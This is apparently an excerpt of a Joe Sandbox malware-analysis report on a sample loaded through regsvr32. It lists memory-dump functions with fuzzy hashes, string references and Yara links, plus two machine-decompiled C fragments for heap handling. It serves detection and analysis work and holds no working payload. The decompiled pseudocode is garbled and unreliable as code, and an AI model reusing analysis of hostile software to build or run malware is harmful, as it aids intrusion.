Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: gLv
API String ID: 0-1669999040
Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
Instruction ID: f642b6e39166a0892e5cc5c724280f8409b661cbee93f99c859590157a58d477
Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
Instruction Fuzzy Hash: 1A41A0B190078E8FDF84CF64C88A5DE7BB0FB18358F104619E866A6290D3B89665CF95

Uniqueness

Uniqueness Score: -1.00%

Function 012818DC Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

2|, xrefs: 01281938

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2|
API String ID: 0-4112153497
Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
Instruction ID: 613271768dd1960935d467b231e3fd453e313bcaa6c5114b05c0de0e5c2df611
Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
Instruction Fuzzy Hash: D031C2715183808FD7A8DF28C58A55BBBF1FBD6704F50891DE6CA8A260DB76D849CB03

Uniqueness

Uniqueness Score: -1.00%

Function 012A4E8C Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

v)v, xrefs: 012A4F79

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: v)v
API String ID: 0-2248367734
Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
Instruction ID: 2559d9050cb97cd0c4a34bd6236bfe22e14ca12fc7454b91cc5f73275d72ba13
Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
Instruction Fuzzy Hash: C131FFB0D107199BDF88DFB8D98A4DDBBF0BB58308F50822DD816B6290D7785A45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0129A244 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

b, xrefs: 0129A33B

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: b
API String ID: 0-1908338681
Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0128D33C Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

Y, xrefs: 0128D348

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Y
API String ID: 0-579211002
Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42

Uniqueness

Uniqueness Score: -1.00%

Function 01290E2C Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

0}, xrefs: 01290EE2

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0}
API String ID: 0-2955618701
Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47

Uniqueness

Uniqueness Score: -1.00%

Function 012898AC Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

6N, xrefs: 012899AB

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6N
API String ID: 0-1503784733
Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 012997CC Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

S}, xrefs: 012998C4

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: S}
API String ID: 0-4277866985
Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0129BDA0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

H-, xrefs: 0129BE4D

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: H-
API String ID: 0-1037293833
Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 012996D4 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

u*AR, xrefs: 0129978C

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: u*AR
API String ID: 0-611844632
Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0128DBA0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

g*`, xrefs: 0128DCA8

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g*`
API String ID: 0-1142845859
Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0129A6BC Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

n*=, xrefs: 0129A6F9

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: n*=
API String ID: 0-1578461029
Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 012892F0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

5$, xrefs: 01289317

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5$
API String ID: 0-3756733592
Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A878 Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0000000118000A878(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x800227e8 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}

0x18000a87c
0x18000a885
0x18000a893

APIs

GetProcessHeap.KERNEL32 ref: 000000018000A87C

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710

Uniqueness

Uniqueness Score: -1.00%

Function 0128B258 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
Instruction ID: d19139e99a11553858989a387ab4456766e8b852748da5874db59603662223f4
Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
Instruction Fuzzy Hash: DBE10670E1470ACFDF58DFA8D49A8AEBBB2FB54348F00415DD806A72A0D7B49615CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 01281000 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
Instruction ID: 15e36b217c8b67a6eb45f5fc197abbfc6ec5bab0e645bd5625811d1652b89330
Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
Instruction Fuzzy Hash: C7C1CEB9903609CFDF68CF38C49A59D3BF1EF64308F604119EC269A2A6D774D529CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0129020C Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
Instruction ID: 14acbc0e41b74ec921e5d13ad63a8bf0a175002bfec8bb0a78c7c5843353591d
Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
Instruction Fuzzy Hash: 0AB12870E14B0D9FDFA8DFA8D48A5DEBBF2FB44344F004519E846A7290D7B8541ACB89

Uniqueness

Uniqueness Score: -1.00%

Function 0128BA2C Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
Instruction ID: cf15de07999477bb4e759fbaf95cd7a23302555f1114ef5a52e889dca2de037c
Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
Instruction Fuzzy Hash: 6FB1F6706087C98FDBBEDF24C8892DA7BA9FB45708F50421DE9CA8E294DB745744CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0129D770 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
Instruction ID: ecd13d832cce56e25d10299ef2f43788bd73e811fdc477222ef47fe57d88bdbc
Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
Instruction Fuzzy Hash: 7F812870908709EFDB58DFA8C49599EBBF1FB54344F00856EE849EB290DB749A09CB81

Uniqueness

Uniqueness Score: -1.00%

Function 012A27EC Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
Instruction ID: 2aace1fb462f4f7e4f2873455ba13f42dc0c49e15fa591a397510c1563f43f5c
Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
Instruction Fuzzy Hash: C28115B151074D9BDF88CF28C8C99DD7BB0FB583A8FA56218FC0AA6254D774D885CB84

Uniqueness

Uniqueness Score: -1.00%

Function 01283ABC Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
Instruction ID: 9716cad5cc2ab417d67422248816d86246466c7b319dccf5bf032a311dc9e8f2
Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
Instruction Fuzzy Hash: 8461207061464D8BDF28EF78D4962AD3BE1FB44304F20613DED668B2A2E774E906CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0129E310 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
Instruction ID: 43cf925ec3d3d037f3b772c559ae154522f2d64f9a551e78e7fc1cb20e39c426
Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
Instruction Fuzzy Hash: 6771F870508789CBDBF9CF28D8896DE7BE4FB88704F10461DE9998B2A0DB749645CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007110 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200

Uniqueness

Uniqueness Score: -1.00%

Function 01282C78 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
Instruction ID: 3259fc6f7fbb4eb68cccf7040c8e0b0cf7b55feb417a1662f3daa0cb46d857bb
Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
Instruction Fuzzy Hash: 4051F770518789CBDBBADF38C8992D97BB0FB58304F90861DD94E8E290DB785749CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006818 Relevance: .1, Instructions: 126
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 56%

			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed long long _t74;
				signed long long _t76;
				signed long long _t77;
				signed int* _t90;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 8)) = __rbx;
				 *((long long*)(_t117 + 0x10)) = _t115;
				 *((long long*)(_t117 + 0x18)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t90 =  *_t66;
				if (_t90 == 0) goto 0x800069ac;
				_t124 =  *0x80021010; // 0xe153c63ea8e4
				_t111 = _t124 ^  *_t90;
				asm("dec eax");
				_t74 = _t124 ^ _t90[4];
				asm("dec ecx");
				asm("dec eax");
				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
				_t101 =  >  ? _t66 : _t76;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t76) + _t76;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
				_t24 = E0000000118000878C(_t66, _t111);
				if (_t66 != 0) goto 0x800068e2;
				_t104 = _t76 + 4;
				r8d = 8;
				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E0000000118000878C(_t66, _t111);
				if (_t129 == 0) goto 0x800069ac;
				_t123 = _t129 + _t76 * 8;
				_t77 = _t129 + _t104 * 8;
				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x80021010; // 0xe153c63ea8e4
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x80021010; // 0xe153c63ea8e4
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x80021010; // 0xe153c63ea8e4
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0x80021010; // 0xe153c63ea8e4
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t77 ^ _t98;
				goto 0x800069af;
				return 0xffffffff;
			}

0x180006818
0x180006818
0x180006818
0x18000681d
0x180006822
0x180006830
0x180006835
0x180006838
0x18000683e
0x180006844
0x180006851
0x18000685a
0x180006864
0x180006868
0x18000686b
0x180006871
0x18000687f
0x180006889
0x18000688d
0x180006890
0x180006893
0x18000689a
0x18000689c
0x18000689c
0x1800068a6
0x1800068b0
0x1800068b8
0x1800068ba
0x1800068be
0x1800068ca
0x1800068d1
0x1800068d4
0x1800068dc
0x1800068e9
0x1800068ed
0x180006905
0x180006909
0x18000690c
0x180006914
0x180006917
0x18000691e
0x18000693d
0x180006943
0x180006946
0x180006959
0x180006962
0x180006968
0x180006979
0x180006982
0x180006986
0x180006992
0x18000699b
0x1800069a6
0x1800069aa
0x1800069c7

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300

Uniqueness

Uniqueness Score: -1.00%

Function 0128B83C Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
Instruction ID: c6ad8a4ed0c05dd4bebd584ff8a02818a7c690b8db549f8bb727a189e9e88238
Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
Instruction Fuzzy Hash: 8D5119719047498BDF48CF68C8895DEBBF1FB48318F11475CE89AA72A0D7789A44CF45

Uniqueness

Uniqueness Score: -1.00%

Function 012890F8 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
Instruction ID: 62d982bc67fc6288663266fb9a7be59a542f836e62e4230c5a44f077a709832d
Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
Instruction Fuzzy Hash: B251B2B090474E8FDB48CF68D48A5DE7FB0FB68398F204619E81596290D7B4D6A5CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 01295CC4 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
Instruction ID: 5e56d30eb8a94a6b698d8082c35b540ba3b0f15150c15b12e600f35199e8d0c0
Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
